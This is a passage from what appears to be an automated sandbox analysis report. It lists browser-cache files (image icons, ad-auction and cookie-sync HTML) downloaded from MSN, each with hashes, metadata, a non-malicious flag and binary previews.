                                                                                                                                                                                                                                                                  SHA-256:2F00C9B0C23EE995091A90ACC7A8FA3AA773612A464F558D78664636C8B7B8D8
                                                                                                                                                                                                                                                                  SHA-512:745B822F9E21DB98B909F3AE762C439C376A35AD5C08655861B05539ACD5C47BCDCF24FAB2FB5A56712BC3BEDE6493FD5152E92D065AC5E9ECCE2DF93C4B78B7
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB15AQNm.img?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jpg&x=868&y=379
                                                                                                                                                                                                                                                                  Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....(...4.m.!....4..i..4..l.C..u .pi....dRe#J..\..t..bC3.)..l.".W.#..&.....-&2.".&.(l..y...r...cE.7..h(#......t..E.....H.^b..../...5 ..r..4&R.>F.. ~..$..R.....1..WDV.L..j.^q..!...T.+..x.$.+._..<{Tc4!.^\$q.ZR`q...Y........A.Ld...(HM.....Z#2b.u40 ...J.F.j.*...Fy.."h..g.&...+H..$2...A....N.c.L...^..c...<Qa..[.. -..v.....-....xg.K.e+..'5[.... !@.ZM.b."....<.........~....(..".~
                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\BB1cG73h[1].png
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                  File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):1131
                                                                                                                                                                                                                                                                  Entropy (8bit):7.767634475904567
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:lGH0pUewXx5mbpLxMkes8rZDN+HFlCwUntvB:JCY9xr4rZDEFC
                                                                                                                                                                                                                                                                  MD5:D1495662336B0F1575134D32AF5D670A
                                                                                                                                                                                                                                                                  SHA1:EF841C80BB68056D4EF872C3815B33F147CA31A8
                                                                                                                                                                                                                                                                  SHA-256:8AD6ADB61B38AFF497F2EEB25D22DB30F25DE67D97A61DC6B050BB40A09ACD76
                                                                                                                                                                                                                                                                  SHA-512:964EE15CDC096A75B03F04E532F3AA5DCBCB622DE5E4B7E765FB4DE58FF93F12C1B49A647DA945B38A647233256F90FB71E699F65EE289C8B5857A73A7E6AAC6
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cG73h.img?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                                                                                                                                                                                                  Preview: .PNG........IHDR................U....pHYs..........+......IDATx..U=l.E.~3;w{..#].Dg!.SD...p...E....PEJ.......B4.RE. :h..B.0.-$.D"Q 8.(.;.r.{3...d...G......7o..9....vQ.+...Q......."!#I......x|...\...& .T6..~......Mr.d.....K..&..}.m.c.....`.`....AAA..,.F.?.v..Zk;...G...r7!..z......^K...z.........y...._..E..S....!$...0...u.-.Yp...@;;;%BQa.j..A.<)..k..N.....9.?..]t.Y.`....o....[.~~..u.sX.L..tN..m1...u...........Ic....,7..(..&...t.Ka.]..,.T..g.."...W......q....:+t.?6....A..}...3h.BM/.....*..<.~..A.`m...:.....H...7.....{.....$... AL..^-...?5FA7'q..8jue...*.....?A...v..0...aS.*:.0.%.%"......[.=a......X..j..<725.C..@.\. ..`.._....'...=....+.Sz.{......JK.A...C|{.|r.$.=Y.#5.K6.!........d.G...{......$.-D*.z..{...@.!d.e...&..o...$Y...v.1.....w..(U...iyWg.$...\>..].N...L.n=.[.....QeVe..&h...`;=.w.e9..}a=.......(.A&..#.jM~4.1.sH.%...h...Z2".........RP....&.3................a..&.I...y.m...XJK..'...a......!.d.......Tf.yLo8.+.+...KcZ.....|K..T....vd....cH.
                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\BB1gqGZR[1].jpg
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):22551
                                                                                                                                                                                                                                                                  Entropy (8bit):7.794325463423114
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:384:IPCnZaWTB83t5MynOQ2rZYVUktoXuFmr8s9aERDy4VDAWnRpH32kav:I2ZaWVT9YVU7eF09guy4dLRpHG1v
                                                                                                                                                                                                                                                                  MD5:5DAEBFAAAC4797244D9AD6F9F87B8C50
                                                                                                                                                                                                                                                                  SHA1:DFDD95E7DC45DA231DD4F14FEE7BDB0D01439B14
                                                                                                                                                                                                                                                                  SHA-256:060BCBAFF51498CCC985066A6114EDF79AE21996F04F9BCA22E279574EB0A5E9
                                                                                                                                                                                                                                                                  SHA-512:FA227A2802A3E7E7EF1902087F65F3935CD640263D1F3223C882EBA8A8F3E3AED3450031D42EEE564A21D2520529C1603DF42D7A5288D70034BC0176A3F023EC
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1gqGZR.img?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jpg
                                                                                                                                                                                                                                                                  Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..I. a4..@.@.-....>..+...'j.ct......:..P.zP.P.M.1.....h.....P..J.....J.$P".j(.`........Hb.p..n..#.L..`Q.6.P.O.....(...%....L..:...P.@....p.......P.zP.P.M.3..(.@.h...........F.@...Hb.J....-.{.....Z.(.....c...iN+...:bH./...a...d.\..#......`K;....v..kk..{..C.sK..u.....3fl.mS.q(...$37.^....Q:1...b..AC..6..@.m....}..WZ....0..GZ.p...@.....P...0..M.4..@. .`P.;.....)."..@..QL.|..H.4.Z
                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\BB7gRE[1].png
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):482
                                                                                                                                                                                                                                                                  Entropy (8bit):7.256101581196474
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:6v/78/kFLsiHAnE3oWxYZOjNO/wpc433jHgbc:zLeO/wc433Cc
                                                                                                                                                                                                                                                                  MD5:307888C0F03ED874ED5C1D0988888311
                                                                                                                                                                                                                                                                  SHA1:D6FB271D70665455A0928A93D2ABD9D9C0F4E309
                                                                                                                                                                                                                                                                  SHA-256:D59C8ADBE1776B26EB3A85630198D841F1A1B813D02A6D458AF19E9AAD07B29F
                                                                                                                                                                                                                                                                  SHA-512:6856C3AA0849E585954C3C30B4C9C992493F4E28E41D247C061264F1D1363C9D48DB2B9FA1319EA77204F55ADBD383EFEE7CF1DA97D5CBEAC27EC3EF36DEFF8E
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7gRE.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                                                                                                                                                                                                  Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........(J....wIDAT8O.RKN.0.}v\....U....-.. ......8..{$...z..@.....+.......K...%)...I......C4.../XD].Y..:.w.....B9..7..Y..(.m.*3. .!..p..,.c.>.\<H.0.*...,w:.F..m...8c,.^........E.......S...G.%.y.b....Ab.V.-.}.=..."m.O..!...q.....]N.)..w..\..v^.^...u...k..0.....R.....c!.N...DN`)x..:.."*Brg.0avY.>.h...C.S...Fqv._.]......E.h.|Wg..l........@.$.Z.]....i8.$).t..y.W..H..H.W.8..B...'............IEND.B`.
                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\BB7hg4[1].png
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):458
                                                                                                                                                                                                                                                                  Entropy (8bit):7.172312008412332
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:6v/78/kFj13TC93wFdwrWZdLCUYzn9dct8CZsWE0oR0Y8/9ki:u138apdLXqxCS7D2Y+
                                                                                                                                                                                                                                                                  MD5:A4F438CAD14E0E2CA9EEC23174BBD16A
                                                                                                                                                                                                                                                                  SHA1:41FC65053363E0EEE16DD286C60BEDE6698D96B3
                                                                                                                                                                                                                                                                  SHA-256:9D9BCADE7A7F486C0C652C0632F9846FCFD3CC64FEF87E5C4412C677C854E389
                                                                                                                                                                                                                                                                  SHA-512:FD41BCD1A462A64E40EEE58D2ED85650CE9119B2BB174C3F8E9DA67D4A349B504E32C449C4E44E2B50E4BEB8B650E6956184A9E9CD09B0FA5EA2778292B01EA5
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7hg4.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                                                                                                                                                                                                  Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........(J...._IDAT8O.RMJ.@...&.....B%PJ.-.......... ...7..P..P....JhA..*$Mf..j.*n.*~.y...}...:...b...b.H<.)...f.U...fs`.rL....}.v.B..d.15..\T.*.Z_..'.}..rc....(...9V.&.....|.qd...8.j..... J...^..q.6..KV7Bg.2@).S.l#R.eE.. ..:_.....l.....FR........r...y...eIC......D.c......0.0..Y..h....t....k.b..y^..1a.D..|...#.ldra.n.0.......:@.C.Z..P....@...*......z.....p....IEND.B`.
                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\BBJrII1[1].png
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):285
                                                                                                                                                                                                                                                                  Entropy (8bit):6.817753121237528
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:6v/lhPahmCsuNR/8GxYbIi9BfLlNN0lgpmPuoEGXn1S/NmredEGWcqp:6v/7wz0Gx2v8lgpmn1GDdgp
                                                                                                                                                                                                                                                                  MD5:815BC0B491D1C2229AA6AF07F213CAB5
                                                                                                                                                                                                                                                                  SHA1:E7F9F38CE6E310209CEC1F291D398AA499CFB64D
                                                                                                                                                                                                                                                                  SHA-256:2705097C373E4DE9A34E02C575A3D86854FCDD08365DA79F93525E68F562917A
                                                                                                                                                                                                                                                                  SHA-512:3B87F4003BE22584D59B301C89FE5B09E16B27126E3A8E90C4DCFD8AB94052A17AEFE7D75443151A48757031033A92077BA603BE01E1A199BC8727B8E0593DC9
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBJrII1.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                                                                                                                                                                                                  Preview: .PNG........IHDR................a....pHYs..........+......IDATx...-..`....].,.b.4h.*~....h2.,v?.`2..2.f.f....2."8A..I..O..;.q....c..<..@)......y..t...-r....{...u.}$....0qF.3..F.]..8C.!....K..FL0.4...29.....2..c..4(.D....S.PE.=,...,,..s._P.)....C../....e.O.7P...f3.!......IEND.B`.
                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\BBPfCZL[1].png
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                  File Type:GIF image data, version 89a, 50 x 50
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):2313
                                                                                                                                                                                                                                                                  Entropy (8bit):7.594679301225926
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:5Zvh21Zt5SkY33fS+PuSsgSrrVi7X3ZgMjkCqBn9VKg3dPnRd:vkrrS333q+PagKk7X3ZgaI9kMpRd
                                                                                                                                                                                                                                                                  MD5:59DAB7927838DE6A39856EED1495701B
                                                                                                                                                                                                                                                                  SHA1:A80734C857BFF8FF159C1879A041C6EA2329A1FA
                                                                                                                                                                                                                                                                  SHA-256:544BA9B5585B12B62B01C095633EFC953A7732A29CB1E941FDE5AD62AD462D57
                                                                                                                                                                                                                                                                  SHA-512:7D3FB1A5CC782E3C5047A6C5F14BF26DD39B8974962550193464B84A9B83B4C42FB38B19BD0CEF8247B78E3674F0C26F499DAFCF9AF780710221259D2625DB86
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                                                                                                                                                                                                  Preview: GIF89a2.2.....7..;..?..C..I..H..<..9.....8..F..7..E..@..C..@..6..9..8..J..*z.G..>..?..A..6..>..8..:..A..=..B..4..B..D..=..K..=..@..<..:..3~.B..D.....,|.4..2..6..:..J..;..G....Fl..1}.4..R.....Y..E..>..9..5..X..A..2..P..J../|.9.....T.+Z.....+..<.Fq.Gn..V..;..7.Lr..W..C..<.Fp.]......A.....0{.L..E..H..@.....3..3..O..M..K....#[.3i..D..>........I....<n..;..Z..1..G..8..E....Hu..1..>..T..a.Fs..C..8..0}....;..6..t.Ft..5.Bi..:.x...E.....'z^~.......[....8`..........;..@..B.....7.....<.................F.....6...........>..?.n......g.......s...)a.Cm....'a.0Z..7....3f..<.:e.....@.q.....Ds..B....!P.n...J............Li..=......F.....B.....:r....w..|..........`..[}.g...J.Ms..K.Ft.....'..>..........Ry.Nv.n..]..Bl........S..;....Dj.....=.....O.y.......6..J.......)V..g..5.......!..NETSCAPE2.0.....!...d...,....2.2........3.`..9.(|.d.C .wH.(."D...(D.....d.Y......<.(PP.F...dL.@.&.28..$1S....*TP......>...L..!T.X!.(..@a..IsgM..|..Jc(Q.+.......2.:.)y2.J......W,..eW2.!....!....C.....d...zeh....P.
                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\BBX2afX[1].png
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                  File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):879
                                                                                                                                                                                                                                                                  Entropy (8bit):7.684764008510229
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:nbwTOG/D9S9kmVgvOc0WL9P9juX7wlA3lrvfFRNa:bwTOk5S96vBB1jGwO3lzfxa
                                                                                                                                                                                                                                                                  MD5:4AAAEC9CA6F651BE6C54B005E92EA928
                                                                                                                                                                                                                                                                  SHA1:7296EC91AC01A8C127CD5B032A26BBC0B64E1451
                                                                                                                                                                                                                                                                  SHA-256:90396DF05C94DD44E772B064FF77BC1E27B5025AB9C21CE748A717380D4620DD
                                                                                                                                                                                                                                                                  SHA-512:09E0DE84657F2E520645C6BE20452C1779F6B492F67F88ABC7AB062D563C060AE51FC1E99579184C274AC3805214B6061AEC1730F72A6445AEBDB7E9F255755F
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                                                                                                                                                                                                  Preview: .PNG........IHDR................U....pHYs..........+.....!IDATx...K.Q..wfv.u.....*.,I"...)...z............>.OVObQ......d?|.....F.QI$....qf.s.....">y`......{~.6.Z.`.D[&.cV`..-8i...J.S.N..xf.6@.v.(E..S.....&...T...?.X)${.....s.l."V..r...PJ*!..p.4b}.=2...[......:.....LW3...A.eB.;...2...~...s_z.x|..o....+..x....KW.G2..9.....<.\....gv...n..1..0...1}....Ht_A.x...D..5.H.......W..$_\G.e;./.1R+v....j.6v........z.k............&..(....,F.u8^..v...d-.j?.w..;..O.<9$..A..f.k.Kq9..N..p.rP2K.0.).X.4..Uh[..8..h....O..V.%.f.......G..U.m.6$......X....../.=....f:.......|c(,.......l.\..<./..6...!...z(......# "S..f.Q.N=.0VQ._..|....>@....P.7T.$./)s....Wy..8..xV......D....8r."b@....:.E.E......._(....4w....Ir..e-5..zjg...e?./...|X..."!..'*/......OI..J"I.MP....#...G.Vc..E..m.....wS.&.K<...K*q..\...A..$.K......,...[..D...8.?..)..3....IEND.B`.
                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\auction[1].htm
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):13128
                                                                                                                                                                                                                                                                  Entropy (8bit):5.812599550900666
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:384:YeBN7QYgwEG8pbRAY+jbWs8RpRMyYstEL0neO83ApcH3E5:YalFgwKEpjqXtftG3/U5
                                                                                                                                                                                                                                                                  MD5:3CAE56E5FB839A9201C7A384125EFB52
                                                                                                                                                                                                                                                                  SHA1:84A06BA44D64CBBF9EE0C95E3607044B2C1A4E2C
                                                                                                                                                                                                                                                                  SHA-256:CCAE9FA4948C62B79C93A2CBC0171D0129C1971BF5A61288C5DD3A99B4508EA5
                                                                                                                                                                                                                                                                  SHA-512:846C2A557076C59F698D79319E2D104B69217C16F2689A869A8CD12D02824BC05E010A3C8B77E776FBA541BEAEDE451606CEEA8B5F7127012B4F14FC0FFAFEC2
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  IE Cache URL:https://srtb.msn.com/auction?a=de-ch&b=1d5f6324af9e451c80da6a10ac5e1596&c=MSN&d=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&e=HP&f=0&g=homepage&h=&j=0&k=0&l=&m=0&n=infopane%7C3%2C11%2C15&o=&p=init&q=&r=&s=1&t=&u=0&v=0&x=&w=&_=1622767695257
                                                                                                                                                                                                                                                                  Preview: ..<script id="sam-metadata" type="text/html" data-json="{&quot;optout&quot;:{&quot;msaOptOut&quot;:false,&quot;browserOptOut&quot;:false},&quot;taboola&quot;:{&quot;sessionId&quot;:&quot;v2_92c39cd52ca8997a2510fa392b20bb03_a30381e5-0c83-4f77-b226-dc2559712c4b-tuct7b27f4c_1622735308_1622735308_CIi3jgYQr4c_GMju18qg45jpNiABKAEwKziy0A1A0IgQSN7Y2QNQ____________AVgAYABoopyqvanCqcmOAQ&quot;},&quot;tbsessionid&quot;:&quot;v2_92c39cd52ca8997a2510fa392b20bb03_a30381e5-0c83-4f77-b226-dc2559712c4b-tuct7b27f4c_1622735308_1622735308_CIi3jgYQr4c_GMju18qg45jpNiABKAEwKziy0A1A0IgQSN7Y2QNQ____________AVgAYABoopyqvanCqcmOAQ&quot;,&quot;pageViewId&quot;:&quot;1d5f6324af9e451c80da6a10ac5e1596&quot;,&quot;RequestLevelBeaconUrls&quot;:[]}">..</script>....<li class="single serversidenativead hasimage " data-json="{&quot;tvb&quot;:[],&quot;trb&quot;:[],&quot;tjb&quot;:[],&quot;p&quot;:&quot;gemini&quot;,&quot;e&quot;:true}" data-provider="gemini" data-ad-region="infopane" data-ad-index="3" data-viewability="{&q
                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\cfdbd9[1].png
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                  File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):740
                                                                                                                                                                                                                                                                  Entropy (8bit):7.552939906140702
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:6v/70MpfkExg1J0T5F1NRlYx1TEdLh8vJ542irJQ5nnXZkCaOj0cMgL17jXGW:HMuXk5RwTTEovn0AXZMitL9aW
                                                                                                                                                                                                                                                                  MD5:FE5E6684967766FF6A8AC57500502910
                                                                                                                                                                                                                                                                  SHA1:3F660AA0433C4DBB33C2C13872AA5A95BC6D377B
                                                                                                                                                                                                                                                                  SHA-256:3B6770482AF6DA488BD797AD2682C8D204ED536D0D173EE7BB6CE80D479A2EA7
                                                                                                                                                                                                                                                                  SHA-512:AF9F1BABF872CBF76FC8C6B497E70F07DF1677BB17A92F54DC837BC2158423B5BF1480FF20553927ECA2E3F57D5E23341E88573A1823F3774BFF8871746FFA51
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  IE Cache URL:https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/cfdbd9.png
                                                                                                                                                                                                                                                                  Preview: .PNG........IHDR................U....sBIT....|.d.....pHYs...........~.....tEXtSoftware.Adobe Fireworks CS6......tEXtCreation Time.07/21/16.~y....<IDATH..;k.Q....;.;..&..#...4..2.....V,...X..~.{..|.Cj......B$.%.nb....c1...w.YV....=g.............!..&.$.mI...I.$M.F3.}W,e.%..x.,..c..0.*V....W.=0.uv.X...C....3`....s.....c..............2]E0.....M...^i...[..]5.&...g.z5]H....gf....I....u....:uy.8"....5...0.....z.............o.t...G.."....3.H....Y....3..G....v..T....a.&K......,T.\.[..E......?........D........M..9...ek..kP.A.`2.....k...D.}.\...V%.\..vIM..3.t....8.S.P..........9.....yI.<...9.....R.e.!`..-@........+.a..*x..0.....Y.m.1..N.I...V.'..;.V..a.3.U....,.1c.-.J<..q.m-1...d.A..d.`.4.k..i.......SL.....IEND.B`.
                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\checksync[1].htm
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):21264
                                                                                                                                                                                                                                                                  Entropy (8bit):5.302864263415922
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:384:R7AGcVXlblcqnzleZSweg2f5ngB/LkPF3OZOwQWwY4RXrqt:F86qhbS2RxF3OswQWwY4RXrqt
                                                                                                                                                                                                                                                                  MD5:098CDB7D2F71DD73CAA8B091070E8F35
                                                                                                                                                                                                                                                                  SHA1:C4B127D6B759BD6F0DB483CE248863B94C05967C
                                                                                                                                                                                                                                                                  SHA-256:2E2601F97DFCAAD082F89C0557615E8507B31986794A9022545722498CF5D643
                                                                                                                                                                                                                                                                  SHA-512:78D49495C1F9EDE6E5F07620B65909498CCE9579D46CC57C240CBA1A4A48556F77B69857AA19B7E896E878DC4747974F1829B06F1BE06E52822F8E8EB7DA5F0C
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":75,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/c21lg-d.m
                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\checksync[2].htm
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):21264
                                                                                                                                                                                                                                                                  Entropy (8bit):5.302864263415922
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:384:R7AGcVXlblcqnzleZSweg2f5ngB/LkPF3OZOwQWwY4RXrqt:F86qhbS2RxF3OswQWwY4RXrqt
                                                                                                                                                                                                                                                                  MD5:098CDB7D2F71DD73CAA8B091070E8F35
                                                                                                                                                                                                                                                                  SHA1:C4B127D6B759BD6F0DB483CE248863B94C05967C
                                                                                                                                                                                                                                                                  SHA-256:2E2601F97DFCAAD082F89C0557615E8507B31986794A9022545722498CF5D643
                                                                                                                                                                                                                                                                  SHA-512:78D49495C1F9EDE6E5F07620B65909498CCE9579D46CC57C240CBA1A4A48556F77B69857AA19B7E896E878DC4747974F1829B06F1BE06E52822F8E8EB7DA5F0C
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":75,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/c21lg-d.m
                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\de-ch[1].htm
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                  File Type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):428944
                                                                                                                                                                                                                                                                  Entropy (8bit):5.443621966043863
                                                                                                                                                                                                                                                                  Encrypted:false
